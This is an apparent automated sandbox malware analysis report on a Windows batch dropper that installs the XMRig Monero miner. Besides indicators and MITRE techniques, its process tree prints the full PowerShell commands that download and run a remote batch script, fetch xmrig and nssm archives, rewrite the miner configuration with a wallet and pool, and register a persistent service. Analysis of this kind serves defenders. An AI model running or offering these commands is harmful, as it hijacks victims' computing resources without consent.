xmrig | 4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

Analysis

max time kernel
750s
max time network
759s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
30/06/2024, 18:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

40651397014960.bat
Size

517B
MD5

ac9d73455d58bfa42f81e718b8c8d6b5
SHA1

60040fff333b7bc09b22e5c013f11b8a99555ed3
SHA256

4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
SHA512

ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://rentry.co/regele/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/memory/1820-66-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/files/0x0007000000023401-64.dat	family_xmrig
behavioral2/files/0x0007000000023401-64.dat	xmrig
behavioral2/memory/2292-201-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-202-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-203-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-204-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-205-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-206-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-207-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-208-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-209-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-210-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-211-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-212-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-213-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-214-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-215-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-216-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-217-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-218-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-219-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-220-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-221-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-222-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-223-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-224-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-225-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-226-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-227-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-228-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-229-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-230-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-231-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-232-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-233-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-234-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-236-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-237-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-238-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-239-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-240-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-241-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-242-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-243-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-244-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-245-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-246-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-247-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-248-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-249-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-250-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-251-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-252-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-253-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-254-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-255-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-256-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-257-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-258-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-259-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-260-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-261-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/2292-262-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
18	4708	powershell.exe
40	4468	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
1820	xmrig.exe
3020	nssm.exe
2664	nssm.exe
2696	nssm.exe
4788	nssm.exe
2556	nssm.exe
640	nssm.exe
4008	nssm.exe
2292	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
17	raw.githubusercontent.com
18	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3324	sc.exe
4840	sc.exe
5104	sc.exe
1928	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4728	powershell.exe
3896	powershell.exe
1036	powershell.exe
4252	powershell.exe
2112	powershell.exe
3224	powershell.exe
4468	powershell.exe
4484	powershell.exe
2904	powershell.exe
976	powershell.exe
4920	powershell.exe
2088	powershell.exe
4708	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
4456	timeout.exe
3076	timeout.exe
2092	timeout.exe
4984	timeout.exe
1656	Process not Found
1756	timeout.exe
2476	timeout.exe
3972	timeout.exe
1552	timeout.exe
1756	timeout.exe
2984	timeout.exe
2188	timeout.exe
2060	timeout.exe
2524	timeout.exe
4292	timeout.exe
3876	timeout.exe
3484	timeout.exe
436	timeout.exe
960	timeout.exe
4940	timeout.exe
5032	timeout.exe
3956	timeout.exe
2672	timeout.exe
3620	timeout.exe
1292	timeout.exe
4884	timeout.exe
2436	Process not Found
1288	timeout.exe
3892	timeout.exe
4036	timeout.exe
2604	timeout.exe
5084	timeout.exe
1916	timeout.exe
4732	timeout.exe
2280	timeout.exe
2804	timeout.exe
2504	timeout.exe
556	timeout.exe
4360	timeout.exe
3184	timeout.exe
2268	timeout.exe
3940	timeout.exe
4796	timeout.exe
3180	timeout.exe
2872	timeout.exe
3612	timeout.exe
1848	timeout.exe
2836	timeout.exe
2836	timeout.exe
4688	timeout.exe
556	timeout.exe
4108	timeout.exe
1972	timeout.exe
4384	timeout.exe
4576	timeout.exe
2268	timeout.exe
2256	timeout.exe
396	timeout.exe
4656	timeout.exe
4712	timeout.exe
672	timeout.exe
1916	timeout.exe
1904	timeout.exe
4440	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4948	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
2088	powershell.exe
2088	powershell.exe
4708	powershell.exe
4708	powershell.exe
4484	powershell.exe
4484	powershell.exe
2904	powershell.exe
2904	powershell.exe
3896	powershell.exe
3896	powershell.exe
976	powershell.exe
976	powershell.exe
1036	powershell.exe
1036	powershell.exe
4252	powershell.exe
4252	powershell.exe
4920	powershell.exe
4920	powershell.exe
3224	powershell.exe
3224	powershell.exe
4728	powershell.exe
4728	powershell.exe
4468	powershell.exe
4468	powershell.exe
2112	powershell.exe
2112	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2088	powershell.exe
Token: SeDebugPrivilege	4948	taskkill.exe
Token: SeDebugPrivilege	4708	powershell.exe
Token: SeDebugPrivilege	4484	powershell.exe
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeDebugPrivilege	976	powershell.exe
Token: SeDebugPrivilege	1036	powershell.exe
Token: SeDebugPrivilege	4252	powershell.exe
Token: SeDebugPrivilege	4920	powershell.exe
Token: SeDebugPrivilege	3224	powershell.exe
Token: SeDebugPrivilege	4728	powershell.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeLockMemoryPrivilege	2292	xmrig.exe
Token: SeIncreaseQuotaPrivilege	1780	WMIC.exe
Token: SeSecurityPrivilege	1780	WMIC.exe
Token: SeTakeOwnershipPrivilege	1780	WMIC.exe
Token: SeLoadDriverPrivilege	1780	WMIC.exe
Token: SeSystemProfilePrivilege	1780	WMIC.exe
Token: SeSystemtimePrivilege	1780	WMIC.exe
Token: SeProfSingleProcessPrivilege	1780	WMIC.exe
Token: SeIncBasePriorityPrivilege	1780	WMIC.exe
Token: SeCreatePagefilePrivilege	1780	WMIC.exe
Token: SeBackupPrivilege	1780	WMIC.exe
Token: SeRestorePrivilege	1780	WMIC.exe
Token: SeShutdownPrivilege	1780	WMIC.exe
Token: SeDebugPrivilege	1780	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1780	WMIC.exe
Token: SeRemoteShutdownPrivilege	1780	WMIC.exe
Token: SeUndockPrivilege	1780	WMIC.exe
Token: SeManageVolumePrivilege	1780	WMIC.exe
Token: 33	1780	WMIC.exe
Token: 34	1780	WMIC.exe
Token: 35	1780	WMIC.exe
Token: 36	1780	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1780	WMIC.exe
Token: SeSecurityPrivilege	1780	WMIC.exe
Token: SeTakeOwnershipPrivilege	1780	WMIC.exe
Token: SeLoadDriverPrivilege	1780	WMIC.exe
Token: SeSystemProfilePrivilege	1780	WMIC.exe
Token: SeSystemtimePrivilege	1780	WMIC.exe
Token: SeProfSingleProcessPrivilege	1780	WMIC.exe
Token: SeIncBasePriorityPrivilege	1780	WMIC.exe
Token: SeCreatePagefilePrivilege	1780	WMIC.exe
Token: SeBackupPrivilege	1780	WMIC.exe
Token: SeRestorePrivilege	1780	WMIC.exe
Token: SeShutdownPrivilege	1780	WMIC.exe
Token: SeDebugPrivilege	1780	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1780	WMIC.exe
Token: SeRemoteShutdownPrivilege	1780	WMIC.exe
Token: SeUndockPrivilege	1780	WMIC.exe
Token: SeManageVolumePrivilege	1780	WMIC.exe
Token: 33	1780	WMIC.exe
Token: 34	1780	WMIC.exe
Token: 35	1780	WMIC.exe
Token: 36	1780	WMIC.exe
Token: SeIncreaseQuotaPrivilege	228	WMIC.exe
Token: SeSecurityPrivilege	228	WMIC.exe
Token: SeTakeOwnershipPrivilege	228	WMIC.exe
Token: SeLoadDriverPrivilege	228	WMIC.exe
Token: SeSystemProfilePrivilege	228	WMIC.exe
Token: SeSystemtimePrivilege	228	WMIC.exe
Token: SeProfSingleProcessPrivilege	228	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2292	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2988 wrote to memory of 2088	2988	cmd.exe	82
PID 2988 wrote to memory of 2088	2988	cmd.exe	82
PID 2088 wrote to memory of 4224	2088	powershell.exe	83
PID 2088 wrote to memory of 4224	2088	powershell.exe	83
PID 4224 wrote to memory of 4428	4224	cmd.exe	84
PID 4224 wrote to memory of 4428	4224	cmd.exe	84
PID 4428 wrote to memory of 1652	4428	net.exe	207
PID 4428 wrote to memory of 1652	4428	net.exe	207
PID 4224 wrote to memory of 1264	4224	cmd.exe	86
PID 4224 wrote to memory of 1264	4224	cmd.exe	86
PID 4224 wrote to memory of 2140	4224	cmd.exe	87
PID 4224 wrote to memory of 2140	4224	cmd.exe	87
PID 4224 wrote to memory of 3784	4224	cmd.exe	88
PID 4224 wrote to memory of 3784	4224	cmd.exe	88
PID 4224 wrote to memory of 4632	4224	cmd.exe	89
PID 4224 wrote to memory of 4632	4224	cmd.exe	89
PID 4224 wrote to memory of 4612	4224	cmd.exe	90
PID 4224 wrote to memory of 4612	4224	cmd.exe	90
PID 4224 wrote to memory of 4840	4224	cmd.exe	187
PID 4224 wrote to memory of 4840	4224	cmd.exe	187
PID 4224 wrote to memory of 3324	4224	cmd.exe	92
PID 4224 wrote to memory of 3324	4224	cmd.exe	92
PID 4224 wrote to memory of 4948	4224	cmd.exe	93
PID 4224 wrote to memory of 4948	4224	cmd.exe	93
PID 4224 wrote to memory of 4708	4224	cmd.exe	95
PID 4224 wrote to memory of 4708	4224	cmd.exe	95
PID 4224 wrote to memory of 4484	4224	cmd.exe	96
PID 4224 wrote to memory of 4484	4224	cmd.exe	96
PID 4224 wrote to memory of 2904	4224	cmd.exe	97
PID 4224 wrote to memory of 2904	4224	cmd.exe	97
PID 4224 wrote to memory of 1820	4224	cmd.exe	98
PID 4224 wrote to memory of 1820	4224	cmd.exe	98
PID 4224 wrote to memory of 4292	4224	cmd.exe	99
PID 4224 wrote to memory of 4292	4224	cmd.exe	99
PID 4292 wrote to memory of 3896	4292	cmd.exe	100
PID 4292 wrote to memory of 3896	4292	cmd.exe	100
PID 3896 wrote to memory of 3484	3896	powershell.exe	101
PID 3896 wrote to memory of 3484	3896	powershell.exe	101
PID 4224 wrote to memory of 976	4224	cmd.exe	102
PID 4224 wrote to memory of 976	4224	cmd.exe	102
PID 4224 wrote to memory of 1036	4224	cmd.exe	103
PID 4224 wrote to memory of 1036	4224	cmd.exe	103
PID 4224 wrote to memory of 4252	4224	cmd.exe	242
PID 4224 wrote to memory of 4252	4224	cmd.exe	242
PID 4224 wrote to memory of 4920	4224	cmd.exe	194
PID 4224 wrote to memory of 4920	4224	cmd.exe	194
PID 4224 wrote to memory of 3224	4224	cmd.exe	106
PID 4224 wrote to memory of 3224	4224	cmd.exe	106
PID 4224 wrote to memory of 4728	4224	cmd.exe	206
PID 4224 wrote to memory of 4728	4224	cmd.exe	206
PID 4224 wrote to memory of 4468	4224	cmd.exe	108
PID 4224 wrote to memory of 4468	4224	cmd.exe	108
PID 4224 wrote to memory of 2112	4224	cmd.exe	111
PID 4224 wrote to memory of 2112	4224	cmd.exe	111
PID 4224 wrote to memory of 1928	4224	cmd.exe	112
PID 4224 wrote to memory of 1928	4224	cmd.exe	112
PID 4224 wrote to memory of 5104	4224	cmd.exe	220
PID 4224 wrote to memory of 5104	4224	cmd.exe	220
PID 4224 wrote to memory of 3020	4224	cmd.exe	114
PID 4224 wrote to memory of 3020	4224	cmd.exe	114
PID 4224 wrote to memory of 2664	4224	cmd.exe	115
PID 4224 wrote to memory of 2664	4224	cmd.exe	115
PID 4224 wrote to memory of 2696	4224	cmd.exe	164
PID 4224 wrote to memory of 2696	4224	cmd.exe	164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\40651397014960.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4EEB.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4224
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4428
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:1652
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:1264
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:2140
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:3784
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:4632
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:4612
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4840
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3324
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2904
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:1820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4292
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3896
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:3484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:976
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Snfvgqlu\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4252
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3224
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4728
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2112
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:1928
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:5104
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:3020
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:2664
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:2696
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:4788
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:2556
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1084
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1780
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3880
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2136
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3668
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4156
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4580
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1052
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4384
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2304
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4796
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
